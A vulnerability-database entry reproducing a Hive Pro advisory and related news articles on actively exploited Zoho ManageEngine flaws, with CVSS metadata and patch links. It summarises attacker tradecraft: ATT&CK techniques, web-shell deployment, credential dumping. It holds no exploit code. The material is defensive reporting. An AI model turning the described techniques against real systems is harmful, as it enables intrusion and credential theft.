Several Zoho ManageEngine products have been exploited

2021-12-05T12:31:49

Description

#### THREAT LEVEL: Red. For a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/11/Several-Zoho-ManageEngine-products-have-been-exploited_TA202154.pdf>)[![](chrome-extension://gmpljdlgcdkljlppaekciacdmdlhfeon/images/beside-link-icon.svg)](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F11%2FSeveral-Zoho-ManageEngine-products-have-been-exploited_TA202154.pdf&embedded=true&chrome=false&dov=1> "View this pdf file" ) Multiple vulnerabilities have been discovered in Zoho ManageEngine products. The affected products include Zoho ManageEngine ServiceDesk Plus, Zoho ManageEngine SupportCenter Plus, Zoho ManageEngine Desktop Central, Zoho ManageEngine AssetExplorer. CVE 2021 44077 is a vulnerability that could allow an attacker to run arbitrary code. It was discovered on November 20, 2021. This vulnerability, however, may be easily fixed by updating to Zoho version 11306, which was released in September. Attackers are focusing on the healthcare, financial services, electronics, and IT consulting businesses by exploiting this vulnerability. CVE 2021 44515 & CVE 2021 44526 are authentication bypass vulnerabilities. CVE 2021 44515 only affects Zoho ManageEngine ServiceDesk and Zoho ManageEngine AssetExplorer who uses Desktop Central Agent for asset discovery and CVE 2021 44526 affects all vulnerable versions of Zoho ManageEngine ServiceDesk and Zoho ManageEngine AssetExplorer. Two of these vulnerabilities (CVE 2021 44077 and CVE 2021 44515) have been exploited in the wild so organizations should upgrade their Zoho ManageEngine products to their latest versions to eliminate these vulnerabilities. The Techniques used by an unknown actor to exploit CVE 2021 44077 includes: T1190 - Exploit Public Facing Application T1505.003 - Server Software Component: Web Shell T1027 - Obfuscated Files or Information T1140 - Deobfuscate/Decode Files or Information T1003 - OS Credential Dumping T1218 - Signed Binary Proxy Execution T1136 - Create Account T1003.003 - OS Credential Dumping: NTDS T1047 - Windows Management Instrumentation T1070.004 - Indicator Removal on Host: File Deletion T1087.002 - Account Discovery: Domain Account T1560.001 - Archive Collected Data: Archive via Utility T1573.001 - Encrypted Channel: Symmetric Cryptography[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F12%2FMicrosoft-could-not-patch-this-vulnerability-yet-again_TA202153.pdf&embedded=true&chrome=false&dov=1> "View this pdf file" ) #### Vulnerability Details ![](https://www.hivepro.com/wp-content/uploads/2021/12/VD-TA202154-1024x424.png) #### Indicators of Compromise(IoCs) * ![](https://www.hivepro.com/wp-content/uploads/2021/12/IOC--1024x807.png) #### Patch Link <https://www.manageengine.com/desktop-management-msp/cve-2021-44515-security-advisory.html> <https://www.manageengine.com/products/service-desk/security-response-plan.html> <https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44526-and-cve-2021-44515-authentication-bypass-vulnerabilities-in-servicedesk-plus-and-desktop-central> <https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44526-and-cve-2021-44515-authentication-bypass-vulnerabilities-in-assetexplorer-and-desktop-central> #### References <https://us-cert.cisa.gov/ncas/alerts/aa21-336a> <https://www.bleepingcomputer.com/news/security/zoho-patch-new-manageengine-bug-exploited-in-attacks-asap/> <https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/> * Indicates parameters that apply to CVE-2021-44077

{"id": "HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280", "vendorId": null, "type": "hivepro", "bulletinFamily": "info", "title": "Several Zoho ManageEngine products have been exploited", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/11/Several-Zoho-ManageEngine-products-have-been-exploited_TA202154.pdf>)[![](chrome-extension://gmpljdlgcdkljlppaekciacdmdlhfeon/images/beside-link-icon.svg)](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F11%2FSeveral-Zoho-ManageEngine-products-have-been-exploited_TA202154.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" ) \n\n\nMultiple vulnerabilities have been discovered in Zoho ManageEngine products. The affected products include Zoho ManageEngine ServiceDesk Plus, Zoho ManageEngine SupportCenter Plus, Zoho ManageEngine Desktop Central, Zoho ManageEngine AssetExplorer. \nCVE 2021 44077 is a vulnerability that could allow an attacker to run arbitrary code. It was discovered on November 20, 2021. This vulnerability, however, may be easily fixed by updating to Zoho version 11306, which was released in September. Attackers are focusing on the healthcare, financial services, electronics, and IT consulting businesses by exploiting this vulnerability. \nCVE 2021 44515 & CVE 2021 44526 are authentication bypass vulnerabilities. CVE 2021 44515 only affects Zoho ManageEngine ServiceDesk and Zoho ManageEngine AssetExplorer who uses Desktop Central Agent for asset discovery and CVE 2021 44526 affects all vulnerable versions of Zoho ManageEngine ServiceDesk and Zoho ManageEngine AssetExplorer. \nTwo of these vulnerabilities (CVE 2021 44077 and CVE 2021 44515) have been exploited in the wild so organizations should upgrade their Zoho ManageEngine products to their latest versions to eliminate these vulnerabilities. \nThe Techniques used by an unknown actor to exploit CVE 2021 44077 includes: \nT1190 - Exploit Public Facing Application \nT1505.003 - Server Software Component: Web Shell \nT1027 - Obfuscated Files or Information \nT1140 - Deobfuscate/Decode Files or Information \nT1003 - OS Credential Dumping \nT1218 - Signed Binary Proxy Execution \nT1136 - Create Account \nT1003.003 - OS Credential Dumping: NTDS \nT1047 - Windows Management Instrumentation \nT1070.004 - Indicator Removal on Host: File Deletion \nT1087.002 - Account Discovery: Domain Account \nT1560.001 - Archive Collected Data: Archive via Utility \nT1573.001 - Encrypted Channel: Symmetric Cryptography[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F12%2FMicrosoft-could-not-patch-this-vulnerability-yet-again_TA202153.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/12/VD-TA202154-1024x424.png)\n\n#### Indicators of Compromise(IoCs) *\n\n![](https://www.hivepro.com/wp-content/uploads/2021/12/IOC--1024x807.png)\n\n#### Patch Link\n\n<https://www.manageengine.com/desktop-management-msp/cve-2021-44515-security-advisory.html>\n\n<https://www.manageengine.com/products/service-desk/security-response-plan.html>\n\n<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44526-and-cve-2021-44515-authentication-bypass-vulnerabilities-in-servicedesk-plus-and-desktop-central>\n\n<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44526-and-cve-2021-44515-authentication-bypass-vulnerabilities-in-assetexplorer-and-desktop-central>\n\n#### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa21-336a>\n\n<https://www.bleepingcomputer.com/news/security/zoho-patch-new-manageengine-bug-exploited-in-attacks-asap/>\n\n<https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/>\n\n \n\n \n\n* Indicates parameters that apply to CVE-2021-44077", "published": "2021-12-05T12:31:49", "modified": "2021-12-05T12:31:49", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.hivepro.com/several-zoho-manageengine-products-have-been-exploited/", "reporter": "Hive Pro", "references": [], "cvelist": ["CVE-2021-44077", "CVE-2021-44515", "CVE-2021-44526"], "immutableFields": [], "lastseen": "2021-12-17T07:20:56", "viewCount": 173, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12", "AKB:72CD807D-E26D-4F68-8717-436863B7F8B1"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0920", "CPAI-2021-1110"]}, {"type": "cisa", "idList": ["CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:72D01121CAFBC56638BC974ABA539CF8", "CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:DD18BE6DC961451834F7597A6E8AAE45", "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, {"type": "cve", "idList": ["CVE-2021-44077", "CVE-2021-44515", "CVE-2021-44526"]}, {"type": "githubexploit", "idList": ["1A95BB02-1B5A-5BC5-9B6B-61483A1C1100"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_SERVICEDESK_PLUS_CVE_2021_44077-"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL", "MANAGEENGINE_SERVICEDESK_11_3_BUILD11306.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165400"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:104BCB9FE21AA540C50BD81151F701D5", "RAPID7BLOG:45C740B931E148E6075FD00036A389CB", "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0"]}, {"type": "srcincite", "idList": ["SRC-2022-0001"]}, {"type": "thn", "idList": ["THN:60B42277F576BB78A640A9D3B976D8D8", "THN:A29E47C7A7467A109B420FF0819814EE", "THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "threatpost", "idList": ["THREATPOST:81CC7A43B010B785FD5977FBA1043E11", "THREATPOST:927CAECDA58E6BC3266D14FE340589BB", "THREATPOST:98AF08B524D08ABCEB115FECEE99B70F"]}, {"type": "zdt", "idList": ["1337DAY-ID-37167"]}]}, "score": {"value": 0.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12", "AKB:72CD807D-E26D-4F68-8717-436863B7F8B1"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0920"]}, {"type": "cisa", "idList": ["CISA:72D01121CAFBC56638BC974ABA539CF8", "CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:DD18BE6DC961451834F7597A6E8AAE45"]}, {"type": "cve", "idList": ["CVE-2021-44077", "CVE-2021-44515", "CVE-2021-44526"]}, {"type": "githubexploit", "idList": ["1A95BB02-1B5A-5BC5-9B6B-61483A1C1100"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_SERVICEDESK_PLUS_CVE_2021_44077/"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL", "MANAGEENGINE_SERVICEDESK_11_3_BUILD11306.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165400"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:45C740B931E148E6075FD00036A389CB"]}, {"type": "srcincite", "idList": ["SRC-2022-0001"]}, {"type": "thn", "idList": ["THN:60B42277F576BB78A640A9D3B976D8D8", "THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "threatpost", "idList": ["THREATPOST:81CC7A43B010B785FD5977FBA1043E11"]}, {"type": "zdt", "idList": ["1337DAY-ID-37167"]}]}, "exploitation": null, "vulnersScore": 0.4}, "_state": {"dependencies": 1659988328, "score": 1659990670}, "_internal": {"score_hash": "0a733f10e5d71f8a142958eb6862af8e"}}

{"thn": [{"lastseen": "2022-05-09T12:37:51", "description": "[![Zoho ManageEngine](https://thehackernews.com/new-images/img/a/AVvXsEjHMcXDV_clY9qcSsKkb2OAnYKFj0UHRQhJw2hVPqXcoFYUHdOV9I1c1_n8Cts-WBNsCC5QeLRhSXMP8AXBcSxfSv7-X1u92p_NKlGh0e1T367go5qLlZP_JyRzjUIMcONyTPXffBuAVxGFdEi87vmow8jsvdsVu1kywwfDfJESNMvFBaxHuAlYmc0Q=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEjHMcXDV_clY9qcSsKkb2OAnYKFj0UHRQhJw2hVPqXcoFYUHdOV9I1c1_n8Cts-WBNsCC5QeLRhSXMP8AXBcSxfSv7-X1u92p_NKlGh0e1T367go5qLlZP_JyRzjUIMcONyTPXffBuAVxGFdEi87vmow8jsvdsVu1kywwfDfJESNMvFBaxHuAlYmc0Q>)\n\nEnterprise software provider Zoho on Friday warned that a newly patched critical flaw in its Desktop Central and Desktop Central MSP is being actively exploited by malicious actors, marking the third security vulnerability in its products to be abused in the wild in a span of four months.\n\nThe issue, assigned the identifier [CVE-2021-44515](<https://nvd.nist.gov/vuln/detail/CVE-2021-44515>), is an authentication bypass vulnerability that could permit an adversary to circumvent authentication protections and execute arbitrary code in the Desktop Central MSP server.\n\n\"If exploited, the attackers can gain unauthorized access to the product by sending a specially crafted request leading to remote code execution,\" Zoho [cautioned](<https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp>) in an [advisory](<https://www.manageengine.com/desktop-management-msp/cve-2021-44515-security-advisory.html>). \"As we are noticing indications of exploitation of this vulnerability, we strongly advise customers to update their installations to the latest build as soon as possible.\"\n\n[![Zoho ManageEngine](https://thehackernews.com/new-images/img/a/AVvXsEj1xx5yUi1N8hhGwCsKIe41nVNxRANWaKDVgeuBCUxVqEN45mzkSaOzVblxzHvLtCK-S72xInMv4NWD4QK3W_SCbiMYIvb1aWhb4RUPVekHI3U6EYX9pyFk2YzPaff25pZUh78cc-rh7QoowlHfpWg_XvNGJTVk5a-4xiCyFSQB1ERi9_IrQwoKwI9U=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEj1xx5yUi1N8hhGwCsKIe41nVNxRANWaKDVgeuBCUxVqEN45mzkSaOzVblxzHvLtCK-S72xInMv4NWD4QK3W_SCbiMYIvb1aWhb4RUPVekHI3U6EYX9pyFk2YzPaff25pZUh78cc-rh7QoowlHfpWg_XvNGJTVk5a-4xiCyFSQB1ERi9_IrQwoKwI9U>)\n\nThe company has also made available an [Exploit Detection Tool](<https://downloads.zohocorp.com/dnd/Desktop_Central/XTsIm8tSrnzjXhW/detector.zip>) that will help customers identify signs of compromise in their installations.\n\nWith this development, CVE-2021-44515 joins two other vulnerabilities [CVE-2021-44077](<https://nvd.nist.gov/vuln/detail/CVE-2021-44077>) and [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) that have been [weaponized](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>) to compromise the networks of critical infrastructure organizations across the world.\n\nThe disclosure also comes a day after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html>) that CVE-2021-44077 \u2014 an unauthenticated, remote code execution vulnerability affecting ServiceDesk Plus \u2014 is being exploited to drop web shells and carry out an array of post-exploitation activities as part of a campaign dubbed \"TiltedTemple.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-04T05:07:00", "type": "thn", "title": "Warning: Yet Another Zoho ManageEngine Product Found Under Active Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077", "CVE-2021-44515"], "modified": "2021-12-04T05:09:04", "id": "THN:DB8E18C57AFB9EEEFDABD840FBF5D938", "href": "https://thehackernews.com/2021/12/warning-yet-another-zoho-manageengine.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:42", "description": "[![ManageEngine Desktop Central Software](https://thehackernews.com/new-images/img/a/AVvXsEi_JzJRZbhmwlI8nV6xvkiS-sqhx4pz9DQL18ARUkEMQ_wOFlAYdEOdD4hlQoSB4-kzuDeFRvQMomyrIIJrBdy18WyEjmjhgJP6BXAkfU9f0Rq6tEf8fPpFqfB2ECAX-eKxA8bnmcz82Btn6m88Da1ZmVoPX2PGZ-VwDYc04o6OHV0-wKonRvpMc6UK=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEi_JzJRZbhmwlI8nV6xvkiS-sqhx4pz9DQL18ARUkEMQ_wOFlAYdEOdD4hlQoSB4-kzuDeFRvQMomyrIIJrBdy18WyEjmjhgJP6BXAkfU9f0Rq6tEf8fPpFqfB2ECAX-eKxA8bnmcz82Btn6m88Da1ZmVoPX2PGZ-VwDYc04o6OHV0-wKonRvpMc6UK>)\n\nEnterprise software maker Zoho on Monday issued patches for a critical security vulnerability in Desktop Central and Desktop Central MSP that a remote adversary could exploit to perform unauthorized actions in affected servers.\n\nTracked as [CVE-2021-44757](<https://nvd.nist.gov/vuln/detail/CVE-2021-44757>), the shortcoming concerns an instance of authentication bypass that \"may allow an attacker to read unauthorized data or write an arbitrary zip file on the server,\" the company [noted](<https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022>) in an advisory.\n\nOsword from SGLAB of Legendsec at Qi'anxin Group has been credited with discovering and reporting the vulnerability. The Indian firm said it remediated the issue in build version 10.1.2137.9.\n\nWith the latest fix, Zoho has addressed a total of four vulnerabilities over the past five months \u2014\n\n * [CVE-2021-40539](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>) (CVSS score: 9.8) \u2013 Authentication bypass vulnerability affecting Zoho ManageEngine ADSelfService Plus\n * [CVE-2021-44077](<https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html>) (CVSS score: 9.8) \u2013 Unauthenticated remote code execution vulnerability affecting Zoho ManageEngine ServiceDesk Plus, ServiceDesk Plus MSP, and SupportCenter Plus, and\n * [CVE-2021-44515](<https://thehackernews.com/2021/12/warning-yet-another-zoho-manageengine.html>) (CVSS score: 9.8) \u2013 Authentication bypass vulnerability affecting Zoho ManageEngine Desktop Central\n\nIn light of the fact that all the three aforementioned flaws have been exploited by malicious actors, it's recommended that users apply the updates as soon as possible to mitigate any potential threats.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T05:13:00", "type": "thn", "title": "Zoho Releases Patch for Critical Flaw Affecting ManageEngine Desktop Central", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077", "CVE-2021-44515", "CVE-2021-44757"], "modified": "2022-01-18T10:03:19", "id": "THN:A29E47C7A7467A109B420FF0819814EE", "href": "https://thehackernews.com/2022/01/zoho-releases-patch-for-critical-flaw.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:51", "description": "[![Zoho ManageEngine Vulnerability](https://thehackernews.com/new-images/img/a/AVvXsEhq1H4Rr-Xal2CT5stc98f2CNC5FoqAVXUgTeE6lsiHRSi39JatAzNIZWMSPz81BrT4zGJ4ZKnlNew3LX6Gc5DzE7Q-u4OMx1uOoJ1jLkeKAhqNhhuBBofCoPvPprhqa7Kwjs4xOGro4J2Smfu9-y5aCWImMp2AAtoBj_aoe5JFpuPMyi-MIZy8F4oq=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEhq1H4Rr-Xal2CT5stc98f2CNC5FoqAVXUgTeE6lsiHRSi39JatAzNIZWMSPz81BrT4zGJ4ZKnlNew3LX6Gc5DzE7Q-u4OMx1uOoJ1jLkeKAhqNhhuBBofCoPvPprhqa7Kwjs4xOGro4J2Smfu9-y5aCWImMp2AAtoBj_aoe5JFpuPMyi-MIZy8F4oq>)\n\nThe U.S. Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are warning of active exploitation of a newly patched flaw in Zoho's ManageEngine ServiceDesk Plus product to deploy web shells and carry out an array of malicious activities.\n\nTracked as [CVE-2021-44077](<https://nvd.nist.gov/vuln/detail/CVE-2021-44077>) (CVSS score: 9.8), the issue relates to an unauthenticated, remote code execution vulnerability affecting ServiceDesk Plus versions up to and including 11305 that, if left unfixed, \"allows an attacker to upload executable files and place web shells that enable post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files,\" CISA [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/12/02/cisa-and-fbi-release-alert-active-exploitation-cve-2021-44077-zoho>).\n\n\"A security misconfiguration in ServiceDesk Plus led to the vulnerability,\" Zoho [noted](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021>) in an independent advisory published on November 22. \"This vulnerability can allow an adversary to execute arbitrary code and carry out any subsequent attacks.\" Zoho [addressed](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above>) the same flaw in versions 11306 and above on September 16, 2021.\n\nCVE-2021-44077 is also the second flaw to be exploited by the same threat actor that was formerly found [exploiting](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>) a security shortcoming in Zoho's self-service password management and single sign-on solution known as ManageEngine ADSelfService Plus ([CVE-2021-40539](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>)) to compromise at least 11 organizations, according to a new report published by Palo Alto Networks' Unit 42 threat intelligence team.\n\n[![Zoho ManageEngine ServiceDesk Vulnerability](https://thehackernews.com/images/-hM1_vIvcTok/Yamv2q2qXSI/AAAAAAAA4jE/UkCg_Dr3xM40aF_fItjQ6LKcw1t-85-iQCNcBGAsYHQ/s728-e1000/timeline.jpg)](<https://thehackernews.com/images/-hM1_vIvcTok/Yamv2q2qXSI/AAAAAAAA4jE/UkCg_Dr3xM40aF_fItjQ6LKcw1t-85-iQCNcBGAsYHQ/s0/timeline.jpg>)\n\n\"The threat actor expand[ed] its focus beyond ADSelfService Plus to other vulnerable software,\" Unit 42 researchers Robert Falcone and Peter Renals [said](<https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/>). \"Most notably, between October 25 and November 8, the actor shifted attention to several organizations running a different Zoho product known as ManageEngine ServiceDesk Plus.\"\n\nThe attacks are believed to be orchestrated by a \"persistent and determined APT actor\" tracked by Microsoft under the moniker \"[DEV-0322](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>),\" an emerging threat cluster that the tech giant says is operating out of China and has been previously observed exploiting a then zero-day flaw in SolarWinds Serv-U managed file transfer service earlier this year. Unit 42 is monitoring the combined activity as the \"**TiltedTemple**\" campaign.\n\nPost-exploitation activities following a successful compromise involve the actor uploading a new dropper (\"msiexec.exe\") to victim systems, which then deploys the Chinese-language JSP web shell named \"Godzilla\" for establishing persistence in those machines, echoing similar tactics used against the ADSelfService software.\n\nUnit 42 identified that there are currently over 4,700 internet-facing instances of ServiceDesk Plus globally, of which 2,900 (or 62%) spanning across the U.S., India, Russia, Great Britain, and Turkey are assessed to be vulnerable to exploitation.\n\nOver the past three months, at least two organizations have been compromised using the ManageEngine ServiceDesk Plus flaw, a number that's expected to climb further as the APT group ramps up its reconnaissance activities against technology, energy, transportation, healthcare, education, finance, and defense industries. \n\nZoho, for its part, has made available an [exploit detection tool](<https://www.manageengine.com/products/service-desk/security-response-plan.html>) to help customers identify whether their on-premises installations have been compromised, in addition to recommending that users \"upgrade to the latest version of ServiceDesk Plus (12001) immediately\" to mitigate any potential risk arising out of exploitation.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-03T05:24:00", "type": "thn", "title": "CISA Warns of Actively Exploited Critical Zoho ManageEngine ServiceDesk Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077"], "modified": "2021-12-03T13:34:13", "id": "THN:60B42277F576BB78A640A9D3B976D8D8", "href": "https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-14T04:09:19", "description": "[![0-Day Vulnerabilities](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjTxKfxj2a6lMbDbJaMo5tht_LOymmcrKcCWFtR24mQo74TUahCanF09uTukayi4zQWtyXbBN6gL1r8Q_F8hPVGvbFPUvpNfu0RMdh_in3x47i7NaY_2APPaDC8WmxtnyovksaoophnnKee-_hL8d3KTmywDQksxEixb5Qu7Hqf3_NL3lzttzW4eVJp/s728-e100/ms.jpg>)\n\nMicrosoft is warning of an uptick among nation-state and criminal actors increasingly leveraging publicly-disclosed zero-day vulnerabilities for breaching target environments.\n\nThe tech giant, in its 114-page [Digital Defense Report](<https://www.microsoft.com/en-us/security/business/microsoft-digital-defense-report-2022>), said it has \"observed a reduction in the time between the announcement of a vulnerability and the commoditization of that vulnerability,\" making it imperative that organizations patch such exploits in a timely manner.\n\nThis also corroborates with an April 2022 advisory from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which [found](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>) that bad actors are \"aggressively\" targeting newly disclosed software bugs against broad targets globally.\n\nMicrosoft noted that it only takes 14 days on average for an exploit to be available in the 